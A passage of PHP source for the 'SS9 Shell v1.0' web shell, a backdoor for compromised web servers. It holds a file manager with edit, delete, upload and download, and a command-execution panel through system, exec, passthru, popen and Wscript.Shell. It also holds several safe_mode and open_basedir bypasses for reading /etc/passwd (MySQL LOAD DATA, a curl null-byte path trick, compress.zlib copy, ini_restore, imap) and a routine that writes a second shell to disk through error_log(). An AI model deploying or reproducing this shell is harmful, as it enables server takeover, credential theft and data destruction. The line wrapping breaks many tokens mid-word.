print("<tr class=" . getrowbg()
. ">");
print(' <td nowrap colspan="7"
style="padding-left: 5px;"><a href="' . $REQUEST_URI . '?dir=' . $dir . '/' . ur
lencode($file) . '">Up Dir</a> You are here[' . $nowpath . ']</td>');
print("</tr>");
}
}
}
}
@closedir($dirs);
print("<tr bgcolor='#cccccc'><td colspan='6' height='5'></td></t
r><FORM method='POST'>");
$dirs = @opendir($dir);
$file_i = 0;
while ($file = @readdir($dirs))
{
$filepath = $dir . "/" . $file;
$a = @is_dir($filepath);
if($a == "0")
{
$size = @size($filepath);
if (@filectime($filepath) == @filemtime($filepat
h))
{
$ctime = @date("Y-m-d H:i:s",@filectime(
$filepath));
$mtime = @date("Y-m-d H:i:s",@filemtime(
$filepath));
}
else
{
$ctime = '<span class="redfont">' . @dat
e("Y-m-d H:i:s",@filectime($filepath)) . "</span>";
$mtime = '<span class="redfont">' . @dat
e("Y-m-d H:i:s",@filemtime($filepath)) . "</span>";
}
$fileperm = substr(base_convert(@fileperms($file
path),10,8),-4);
$fileperm = (substr($fileperm,1,3) == 777 or 666
) ? '<font color="green">' . $fileperm . '</font>' : $fileperm;

print('<tr class="' . getrowbg() . '">');

print(' <td style="padding-left: 5px;">');
print('&gt; ');
if (in_array($file, $danger_files))
{
print('<a href="' . $filepath . '" targe
t="_blank"><font color="yellow"><b>' . $file . '</b></font></a></td>');
}
else
{
print('<a href="' . $filepath . '" targe
t="_blank">' . $file . '</a></td>');
}
print(' <td align="center" nowrap class="smlfon
t"><span class="ccfont">' . $ctime . '</span></td>');
print(' <td align="center" nowrap class="smlfon
t"><span class="ccfont">' . $mtime . '</span></td>');
print(' <td align="left" nowrap class="smlfont"
><span class="ccfont">&nbsp;' . $size . '</span></td>');
print(' <td align="center" nowrap class="smlfon
t"><span class="ccfont"><a href="' . $REQUEST_URI . '?act=editfile&file=' . $fil
e . '">[Edit]</a></span></td>');
print(' <td align="center" nowrap class="smlfon
t"><span class="ccfont"><a href="' . $REQUEST_URI . '?act=delfile&file=' . $file
. '&pwd=' . $nowpath . '">[Delete]</a></span></td>');
print(' <td align="center" nowrap class="smlfon
t"><span class="ccfont">' . $fileperm . '</span></td>');
print("</tr>");
$file_i++;
}
}
@closedir($dirs);
print("</FORM>");
$tb->tablefooter();
############## Exploits and execute ##########
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'
system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'
=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'pa
ssthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
$tb->tableheader();
print('<tr class="top"><td><b>Exploits and execution :</b></td><
/tr>');
$tb->tdbody('<table width="100%" border="0" cellpadding="3" cell
spacing="2"><tr>');
$tb->headerform1(array('action'=>'?act=cmd','content'=>$tb->td('
:: Execution Commands ::<br>' . $tb->makeselect(array('name'=>'execfunc','option
'=>$execfuncs,'selected'=>$execfunc)) . ' ' . $tb->makeinput('command') . ' ' .
$tb->makeinput('Run','Run','','submit'))));
$tb->headerform1(array('action'=>'?act=readsql','content'=>$tb->
td(':: Read file with [SQL] ::<br>' . $tb->makeinput('sql','/etc/passwd') . '&nb
sp;' . $tb->makeinput('','Read','sql','submit'))));
print("</tr><tr>");
$tb->headerform1(array('action'=>'?act=curl','content'=>$tb->td(
':: Read file with [CURL] ::<br>' . $tb->makeinput('curl','/etc/passwd') . '&nbs
p;' . $tb->makeinput('','Read','curl','submit'))));
$tb->headerform1(array('action'=>'?act=copy','content'=>$tb->td(
':: Read file with [copy] ::<br>' . $tb->makeinput('copy','/etc/passwd') . '&nbs

p;' . $tb->makeinput('','Read','copy','submit'))));
print("</tr><tr>");
$tb->headerform1(array('action'=>'?act=ini_restore','content'=>$
tb->td(':: Read file with [ini_restore] ::<br>' . $tb->makeinput('file','/etc/pa
sswd') . '&nbsp;' . $tb->makeinput('','Read','M2','submit'))));
$tb->headerform1(array('action'=>'?act=imap','content'=>$tb->td(
':: Read file or dir with [imap] ::<br>' . $tb->makeimp('switch','/etc/passwd')
. '&nbsp;' . $tb->makeinput('string','/etc/passwd' ) . '&nbsp;' . $tb->makeinput
('string','Read','','submit'))));
print("</tr><tr>");
$tb->headerform1(array('action'=>'?act=id','content'=>$tb->td(':
: Read file with [id] ::<br>' . $tb->makeid('plugin','cat /etc/passwd') . '&nbsp
;' . $tb->makeinput('','Read','plugin','submit'))));
$tb->headerform1(array('action'=>'?act=error','content'=>$tb->td
(':: Make file with [ERORR] ::<br>' . $tb->makeinput('ER','error.php') . '&nbsp;
' . $tb->makeinput('','Write','ER','submit'))));
print("</tr><tr>");
$tb->headerform1(array('action'=>'?act=upload&dir=' . urlencode(
$dir),'enctype'=>'multipart/form-data','content'=>$tb->td(':: Upload file ::<br>
'.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','Uploa
d','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))));
$tb->headerform1(array('action'=>'?act=mkdir','content'=>$tb->td
(':: Make directory ::<br>'.$tb->makeinput('newdirectory').' '.$tb->makeinput('c
reatedirectory','Make directory','','submit'))));
print("</tr><tr>");
$tb->headerform1(array('action'=>'?act=download','content'=>$tb>td(':: Download file ::<br>'.$tb->makeinput('downname',$nowpath,'','text',40).'
<br>'.$tb->makeinput('compress','none','checked','radio','','').' without archiv
e '.((@function_exists('gzcompress')) ? $tb->makeinput('compress','zip','','radi
o','','').' zip' : '').' '.((@function_exists('gzencode')) ? $tb->makeinput('com
press','gzip','','radio','','').' gzip': '').' '.((@function_exists('bzcompress'
)) ? $tb->makeinput('compress','bzip','','radio','','').' bzip' : '').'<br>'.$tb
->makeinput('download','Download','','submit'))));
$tb->headerform1(array('action'=>'?act=rename','content'=>$tb->t
d(':: Rename file ::<br>'.$tb->makeinput('oldname','Old name','','','15').' '.$t
b->makeinput('newname','New name','','','15').' '.$tb->makeinput('renamefile','R
ename','','submit'))));
print('</table></table>');
dofooter();
}
################# Start Bugs #################
############### Read File SQL() ##############
if ($_GET['act'] == 'readsql')
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [SQL]: ' . $_POST['sql'] . '</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);

$file = $_POST['sql'];
$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/
etc/proftpd.conf";
$mysql_files = explode(':', $mysql_files_str);
$sql = array("USE " . $mysql['db'], 'CREATE TEMPORARY TABLE ' .
($tbl = 'A' . time()) . ' (a LONGBLOB)', "LOAD DATA LOCAL INFILE '" . $file . "'
INTO TABLE " . $tbl . " FIELDS " . "TERMINATED BY
'__THIS_NEVER_HAPPENS__
' " . "ESCAPED BY
'' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'"
, "SELECT a FROM " . $tbl . " LIMIT 1");
mysql_connect($mysql['host'], $mysql['user'], $mysql['pass']);
foreach ($sql as $statement)
{
$q = mysql_query($statement);
if ($q == false) die ("FAILED: " . $statement . "REASON:
" . mysql_error());
if (!$r = @mysql_fetch_array($q, MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result($q);
}
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
#################### ERROR ###################
if ($_GET['act'] == 'error')
{
doheader();
$ERORR = $_POST['ER'];
print(error_log('<html>
<head>
<title>SS9 v1.0 [exploit error_log()]</title>
</head>
<body bgcolor="#000000">
<center>
<table Width="100%" height="10%" bgcolor="#222222" border="1">
<tr>
<td><center><font size="6" color="#cccccc">Exploit error_log() function</font></
center></td>
</tr>
</table>
<font color="#FF0000">
<?
if (isset($_POST["fileup"]))
{
$path = exec("pwd");
$path .= "/" . $fileup_name;
if (copy($fileup,$path))
{

print("Successfully upload file.");

}
else
{
print("Sorry, don\'t upload file.");
}
}
if (isset($_POST["cmd"]) and !empty($_POST["cmd"]))
{
$cmd = $_POST["cmd"];
print("<textarea>" . system($cmd) . "</textarea>");
}
if (isset($_POST["inc"]) and !empty($_POST["inc"]))
{
$inc = $_POST["inc"];
print include($inc);
}
?>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="fileup" size="20">
<input type="submit" value=" Upload ">
</form>
<form method="POST">
<input type="text" name="inc" size="20">
<input type="submit" value=" Include ">
</form>
<form method="POST" enctype="multipart/form-data" >
<input type="text" name="cmd" size="20">
<input type="submit" value=" Run ">
</form>
</center>
</body>
</html>', 3,$ERORR));
dofooter();
exit;
}
###################### id ####################
if ($_GET['act'] == 'id')
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [id]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
for($uid = 0; $uid < 60000; $uid++)
{
$ara = posix_getpwuid($uid);

if (!empty($ara))
{
while (list ($key, $val) = each($ara))
{
print($val . ":");
}
}
}
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
#################### CURL ####################
if ($_GET['act'] == 'curl')
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [CURL]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
$curl = $_POST['curl'];
$ch = curl_init("file:///" . $curl . "\x00/../../../../../../../
../../../../../" . __FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
#################### copy ####################
if ($_GET['act'] == 'copy')
{
$copy = $_POST['copy'];
$temp = tempnam("", "cx");
if (file_exists($copy))
{
if (copy("compress.zlib://" . $copy, $temp))
{
doheader();

print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [copy]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
$fp = fopen($temp, "r");
$fr = fread($fp, filesize($temp));
fclose($fp);
print(htmlspecialchars($fr));
unlink($temp);
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
else
{
doheader();
msg('Sorry, File <B>' . htmlspecialchars($copy)
. '</B> you don\'t have access to it.');
goto($REQUEST_URI . '?');
dofooter();
exit;
}
}
else
{
doheader();
msg('Sorry, File <B>' . htmlspecialchars($copy) . '</B>
dosen\'t exists.');
goto($REQUEST_URI . '?');
dofooter();
exit;
}
}
################ ini_restore #################
if ($_GET['act'] == 'ini_restore')
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [ini_restore]:</b></td></tr></table>
</td>

</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
$file = $_POST['file'];
print(fetch_env("safe_mode"));
print(fetch_env("open_basedir"));
$s = readfile($file);
ini_restore("safe_mode");
ini_restore("open_basedir");
print(fetch_env("safe_mode"));
print(fetch_env("open_basedir"));
print $s = readfile($file);
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
#################### imap ####################
if ($_GET['act'] == 'imap')
{
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
if ($string and $switch == "file")
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [imap]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
$stream = imap_open($string, "", "");
$str = imap_body($stream, 1);
if (!empty($str))
{
print("<pre>" . $str . "</pre>");
}
imap_close($stream);
print('</textarea>
</td>
</tr>

</table>');
dofooter();
exit;
}
elseif ($string and $switch == "dir")
{
doheader();
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
{
msg("Can't open imap stream");
dofooter();
exit;
}
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read dir [imap]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
$string = explode("|",$string);
if (count($string) > 1)
{
$dir_list = imap_list($stream, trim($string[0]),
trim($string[1]));
}
else
{
$dir_list = imap_list($stream, trim($string[0]),
"*");
}
print("<pre>");
for ($i = 0; $i < count($dir_list); $i++)
{
print($dir_list[$i] . "<p>&nbsp;</p>");
}
print("</pre>");
imap_close($stream);
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}

}
############### Start Functions ##############
class SearchResult
{
var $text;
var $FilesToSearch;
var $ResultFiles;
var $FilesTotal;
var $MatchesCount;
var $FileMatschesCount;
var $TimeStart;
var $TimeTotal;
var $titles;
function SearchResult($dir,$text,$filter='')
{
$dirs = @explode(";",$dir);
$this->FilesToSearch = Array();
for ($a = 0; $a < count($dirs); $a++)
$this->FilesToSearch = @array_merge($this->FilesToSearch
,DirFilesR($dirs[$a],$filter));
$this->text = $text;
$this->FilesTotal = @count($this->FilesToSearch);
$this->TimeStart = getmicrotime();
$this->MatchesCount = 0;
$this->ResultFiles = Array();
$this->FileMatchesCount = Array();
$this->titles = Array();
}
function GetFilesTotal()
{
return $this->FilesTotal;
}
function GetTitles()
{
return $this->titles;
}
function GetTimeTotal()
{
return $this->TimeTotal;
}
function GetMatchesCount()
{
return $this->MatchesCount;
}
function GetFileMatchesCount()
{
return $this->FileMatchesCount;
}
function GetResultFiles()
{
return $this->ResultFiles;
}

function SearchText($phrase=0,$case=0)
{
$qq = @explode(' ',$this->text);
$delim = '|';
if ($phrase)
foreach ($qq as $k=>$v)
$qq[$k] = '\b'.$v.'\b';
$words = '('.@implode($delim,$qq).')';
$pattern = "/".$words."/";
if (!$case)
$pattern .= 'i';
foreach ($this->FilesToSearch as $k=>$filename)
{
$this->FileMatchesCount[$filename] = 0;
$FileStrings = @file($filename) or @next;
for($a=0;$a<@count($FileStrings);$a++)
{
$count = 0;
$CurString = $FileStrings[$a];
$CurString = @Trim($CurString);
$CurString = @strip_tags($CurString);
$aa = '';
if(($count = @preg_match_all($pattern,$C
urString,$aa)))
{
$CurString = @preg_replace($patt
ern,'<font color="yellow"><b>\\1</b></font>',$CurString);
$this->ResultFiles[$filename][$a
+1] = $CurString;
$this->MatchesCount += $count;
$this->FileMatchesCount[$filenam
e] += $count;
}
}
}
$this->TimeTotal = @round(getmicrotime() - $this->TimeSt
art,4);
}
}
function getmicrotime()
{
list($usec,$sec) = @explode(" ",@microtime());
return ((float)$usec + (float)$sec);
}
function DirFilesR($dir,$types='')
{
$files = Array();
if (($handle = @opendir($dir)))
{
while (false !== ($file = @readdir($handle)))
{
if ($file != "." && $file != "..")
{
if (@is_dir($dir."/".$file))
{
$files = @array_merge($files,Dir
FilesR($dir."/".$file,$types));

}
else
{
$pos = @strrpos($file,".");
$ext = @substr($file,$pos,@strle
n($file)-$pos);
if ($types)
{
if(@in_array($ext,explod
e(';',$types)))
{
$files[] = $dir.
"/".$file;
}
}
else
{
$files[] = $dir."/".$fil
e;
}
}
}
}
@closedir($handle);
}
return $files;
}
class zipfile
{
var $datasec
var $ctrl_dir
var $eof_ctrl_dir
var $old_offset

=
=
=
=

array();
array();
"\x50\x4b\x05\x06\x00\x00\x00\x00";
0;

function unix2DosTime($unixtime = 0)
{
$timearray = ($unixtime == 0) ? getdate() : getdate($uni
xtime);
if ($timearray['year'] < 1980)
{
$timearray['year']
= 1980;
$timearray['mon']
= 1;
$timearray['mday']
= 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray
['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($ti
mearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0)
{
$name
= str_replace('\\', '/', $name);
$dtime
= dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime
[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');

$fr
$fr
$fr
$fr
$fr
$unc_len
$crc
$zdata
$zdata

= "\x50\x4b\x03\x04";
.= "\x14\x00";
.= "\x00\x00";
.= "\x08\x00";
.= $hexdtime;
= strlen($data);
= crc32($data);
= gzcompress($data);
= substr(substr($zdata, 0, strlen($zdata) - 4),

2);
$c_len = strlen($zdata);
$fr
.= pack('V', $crc);
$fr
.= pack('V', $c_len);
$fr
.= pack('V', $unc_len);
$fr
.= pack('v', strlen($name));
$fr
.= pack('v', 0);
$fr
.= $name;
$fr
.= $zdata;
$this->datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name));
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this->old_offset);
$this->old_offset += strlen($fr);
$cdrec .= $name;
$this->ctrl_dir[] = $cdrec;
}
function file()
{
$data
= implode('', $this->datasec);
$ctrldir = implode('', $this->ctrl_dir);
return $data . $ctrldir . $this->eof_ctrl_dir . pack('v'
, sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strl
en($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
}
}
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding,$mime_type;
if ($compress == 'bzip' and @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
elseif ($compress == 'gzip' and @function_exists('gzencode'))

{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
elseif ($compress == 'zip' and @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile->addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile->file();
}
else
{
$mime_type = 'application/octet-stream';
}
}
function msg($message, $color = "white")
{
print('
<table width="775" border="0" cellpadding="3" cellspacing="0">
<tr class="td">
<td class="td"><p align="center"><font color="' . $color . '">'
. $message . '</font></p></td>
</tr>
</table>
');
}
function disksize($disk)
{
$types = Array("B","KB","MB","GB","TB");
$i = 0;
while ($disk > 1024)
{
$i++;
$disk /= 1024;
}
return round($disk,2) . " " . $types[$i];
}
function size($file)
{
$types = Array("B","KB","MB","GB","TB");
$bytes = filesize($file);
if (!$bytes)
{
return 0;
}
else
{
$i = 0;
while ($bytes > 1024)
{
$i++;
$bytes /= 1024;
}

return round($bytes,2) . " " . $types[$i];

}
}
function stripslashes_array(&$array)
{
while (list($key,$var) = each($array))
{
if ($key != 'argc' and $key != 'argv' and (strtoupper($k
ey) != $key or '' . intval($key) == "$key"))
{
if (is_string($var))
{
$array[$key] = stripslashes($var);
}
if (is_array($var))
{
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
function getrowbg()
{
global $bgcounter;
if ($bgcounter++%2==0)
{
return "firstalt";
}
else
{
return "secondalt";
}
}
function getPath($mainpath, $relativepath)
{
global $dir;
$mainpath_info
= explode('/', $mainpath);
$relativepath_info
= explode('/', $relativepath);
$relativepath_info_count = count($relativepath_info);
for ($i=0; $i<$relativepath_info_count; $i++)
{
if ($relativepath_info[$i] == '.' or $relativepath_info[
$i] == '') continue;
if ($relativepath_info[$i] == '..')
{
$mainpath_info_count = count($mainpath_info);
unset($mainpath_info[$mainpath_info_count-1]);
continue;
}
$mainpath_info[count($mainpath_info)] = $relativepath_in
fo[$i];
}
return implode('/', $mainpath_info);
}

class FORMS
{
function tableheader()
{
print('<table width="775" border="0" cellpadding="3" cel
lspacing="1" bgcolor="#ffffff">');
}
function headerform($arg = array())
{
global $dir;
if ($arg['enctype'])
{
$enctype = 'enctype="' . $arg['enctype'] . '"';
}
else
{
$enctype = "";
}
if (!isset($arg['method']))
{
$arg['method'] = "POST";
}
if (!isset($arg['action']))
{
$arg['action'] = "";
}
print('<form action="' . $arg['action'] . '" method="' .
$arg['method'] . '" ' . $enctype . '><tr><td>' . $arg['content'] . '</td></tr><
/form>');
}
function headerform2($arg = array())
{
return $arg['content'];
}
function headerform1($arg = array())
{
global $dir;
if ($arg['enctype'])
{
$enctype = 'enctype="' . $arg['enctype'] . '"';
}
else
{
$enctype = "";
}
if (!isset($arg['method']))
{
$arg['method'] = "POST";
}
if (!isset($arg['action']))
{
$arg['action'] = "";

}
print('<form action="' . $arg['action'] . '" method="' .
$arg['method'] . '" ' . $enctype . '>' . $arg['content'] . '</form>');
}
function tdheader($title)
{
global $dir, $REQUEST_URI;
print('<tr class="firstalt"><td align="center"><b>' . $t
itle . '</b></td></tr>');
}
function tdbody($content,$align = 'center',$bgcolor = '2',$heigh
t = '',$extra = '',$colspan = '')
{
if ($bgcolor == '2')
{
$css = "secondalt";
}
elseif ($bgcolor == '1')
{
$css = "firstalt";
}
else
{
$css = $bgcolor;
}
$height = empty($height) ? "" : " height=" . $height;
$colspan = empty($colspan) ? "" : " colspan=" . $colspan
;
print('<tr class="' . $css . '"><td align="' . $align .
'"' . $height . $colspan . ' ' . $extra . '>' . $content . '</td></tr>');
}
function tablefooter()
{
print("</table>");
}
function td($content, $width = '50%', $class = 'td')
{
$result = '<td align="center" width="' . $width . '" cla
ss="' . $class . '">' . $content . '</td>';
return $result;
}
function makehidden($name,$value = '')
{
print('<input type="hidden" name="' . $name . '" value="
' . $value . '">');
}
function makeinput($name,$value = '',$extra = '',$type = 'text',
$size = '30',$css = 'input')
{
$css = ($css == 'input') ? ' class="input"' : ' style="'
. $css . '"';

$input = '<input name="' . $name . '" value="' . $value

. '" type="' . $type . '"' . $css . ' size="' . $size . '" ' . $extra . '>';
return $input;
}
function makeid($name,$value = '',$extra = '',$type = 'select',$css = 'i
nput')
{
$css = ($css == 'input') ? ' class="input"' : ' style="'
. $css . '"';
$input = '<select ' . $css . ' name="plugin"><option>cat
/etc/passwd</option></select>';
return $input;
}
function makeimp($name,$value = '',$extra = '',$type = 'select',
$css = 'input')
{
$css = ($css == 'input') ? ' class="input"' : ' style="'
. $css . '"';
$input = '<select ' . $css . ' name="switch"><option val
ue="file">View file</option><option value="dir">View dir</option></select>';
return $input;
}
function makeselect($arg = array())
{
if ($arg['multiple'] == 1)
{
$multiple = " multiple";
if ($arg['size'] > 0)
{
$size = ' size="' . $arg['size'] . '"';
}
}
if ($arg['css'] == 0)
{
$css = 'class="input"';
}
$select = '<select ' . $css . ' name="' . $arg['name'] .
'"' . $multiple . $size . '>';
if (is_array($arg['option']))
{
foreach ($arg['option'] AS $key => $value)
{
if (!is_array($arg['selected']))
{
if ($arg['selected'] == $key)
{
$select .= '<option valu
e="' . $key . '" selected>' . $value . '</option>';
}
else
{
$select .= '<option valu
e="' . $key . '">' . $value . '</option>';
}

}
elseif (is_array($arg['selected']))
{
if ($arg['selected'][$key] == 1)
{
$select .= '<option valu
e="' . $key . '" selected>' . $value . '</option>';
}
else
{
$select .= '<option valu
e="' . $key . '">' . $value . '</option>';
}
}
}
}
$select .= "</select>";
return $select;
}
}
function doheader()
{
global $pwd, $safe_mode, $safemode, $dis_func;
print('<html dir="ltr">
<head>
<title>SS9 v1.0</title>
' . css() . '
<SCRIPT language="JavaScript">
function CheckAll(form)
{
for (var i = 0; i < form.elements.length; i++)
{
var e = form.elements[i];
if (e.name != "chkall")
e.checked = form.chkall.checked;
}
}
function really(d,f,m,t)
{
if (confirm(m))
{
if (t == 1)
{
window.location.href = "?dir=" + d + "&deldir=" + f;
}
else
{
window.location.href = "?dir=" + d + "&delfile=" + f;
}
}
}
</SCRIPT>
</head>
<body bgcolor="#000000" topmargin="0" leftmargin="0" bottommargin="0" rightmargi
n="0">
<center>
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<!-- start header -->

<table width="775" border="0" cellpadding="0">

<tr>
<td>
<table width="775" border="0" cellpadding="3" cellspacin
g="1" bgcolor="#ffffff">
<tr class="top">
<td align="center"><font size="1" color="#000011">001100
0011101010010101001010100100100010110111100101001011101010010</font> SS9 Shell v
1.0 #1 <font size="1" color="#000011">110000111010100101010010101001001000101101
1110010100101110101001001</font></td>
</tr>
<tr class="top">
<td align="center">
<table width="99%" style="border-collaps
e: collapse" border="0" cellpadding="0" cellspacing="0"><tr><td width="10%">Serv
er OS :</td><td width="90%">' . php_uname() . '</td></tr><tr><td>Software :</td>
<td>' . getenv("SERVER_SOFTWARE") . '</td></tr><tr><td>pwd :</td><td>' . $pwd .'
</td></tr><tr><td>Safe Mode :</td><td>' . $safemode . '</td></tr>');
if ($safe_mode == "on" or strtolower($safe_mode) == "on")
{
print('<tr><td>Disable Functions :</td><td>' . $dis_func
. '</td></tr>');
}
print(' <tr><td>Extra :</td><td>PHP Version: ' . phpversion() .
' | MySQL: ' . ((@function_exists('mysql_connect'))?'<font color="green">Yes</fo
nt>':'<font color="red">No</font>') . ' | MSSQL: ' . ((@function_exists('mssql_c
onnect'))?'<font color="green">Yes</font>':'<font color="red">No</font>') . ' |
PostgreSQL: ' . ((@function_exists('pg_connect'))?'<font color="green">Yes</font
>':'<font color="red">No</font>') . ' | Oracle: ' . ((@function_exists('ocilogon
'))?'<font color="green">Yes</font>':'<font color="red">No</font>') . ' | CURL:
' . ((@function_exists('curl_version'))?'<font color="green">Yes</font>':'<font
color="red">No</font>') . ' | FreeSpace: ' . disksize(diskfreespace($pwd)) . ' |
TotalSpace: ' . disksize(disk_total_space($pwd)) . '</td></tr></table>
</td>
<tr class="secondalt">
<td align="center">[<a href="' . $REQUEST_URI .
'?act=about" title="View About Page">About</a>] - [<a href="' . $REQUEST_URI . '
?act=search" title="Search text in files">Search</a>] - [<a href="' . $REQUEST_U
RI . '?act=mail" title="Send Mail">Mail</a>] - [<a href="' . $REQUEST_URI . '?ac
t=eval" title="Eval Code">Eval</a>] - [<a href="' . $REQUEST_URI . '?act=cmd">Co
mmand </a>] - [<a href="' . $REQUEST_URI . '?act=phpinfo" title="View Informatio
n of PHP">PHPinfo</a>] - [<a href="' . $REQUEST_URI . '?act=delete" title="Delet
e This Script From Server">Delete</a>]</td>
</tr>
</table>
</td>
</tr>
</table>
<!-- end header -->
');
}
function dofooter()
{
print('
<!-- start footer -->
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">

<table width="99%" style="border-collapse: collapse" bor

der="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%"><div align="center"><font size=
"1" color="#000011">01011011110010100101110101001001111010100</font> SS9 Shell v
1.0, Coded By <a href="mailto:inlove.511[at]gmail[dot]com" title="Send Message T
o ServeR00T">ServeR00T</a> - www.v99x.com - www.xp10.cc <font size="1" color="#0
00011">01011011110010100101110101001001111010100</font></div></td>
</tr>
</table>
</td>
</tr>
</table>
<!-- end footer -->
</table>
</body>
</html>');
}
function html_cmd($content)
{
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>commands [ system , shell_exec , passthru , Wscript.Shell , exe
c , popen ]</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0">
<form action="" method="POST">
<tr>
<td>' . $content . '</td>
</tr>
</form>
<tr class="secondalt">
<td align="center"><textarea name="textarea" col
s="90" rows="25" readonly>');
}
function html_fd($content)
{
print('
<table width="775" border="0" cellpadding="3" cellspacing="1"
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0"
g="0"><tr><td><b>Execute on files and directories [File edit or make,
e, Make directory]</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<table width="98%" border="0" cellpadding="0"

bgcolor="#

cellspacin
Upload fil

cellspacin

g="0">
<tr>
<td width="50%">' . $content1 . '</td>
<td width="50%">' . $content2 . '</td>
</tr>
<tr>
<td width="50%">' . $content3 . '</td>
<td width="50%">' . $content4 . '</td>
</tr>
</table>
</td>
</tr>
</table>');
}
function fetch_env($name)
{
if (function_exists('ini_get'))
{
return ini_get($name);
}
else
{
return get_cfg_var($name);
}
}
function goto($url, $seconds = 2)
{
print('<meta http-equiv="refresh" content="' . $seconds . '; url
=' . $url . '">');
}
function css()
{
return '<style type="text/css">
body, td
{
font-family: Tahoma;
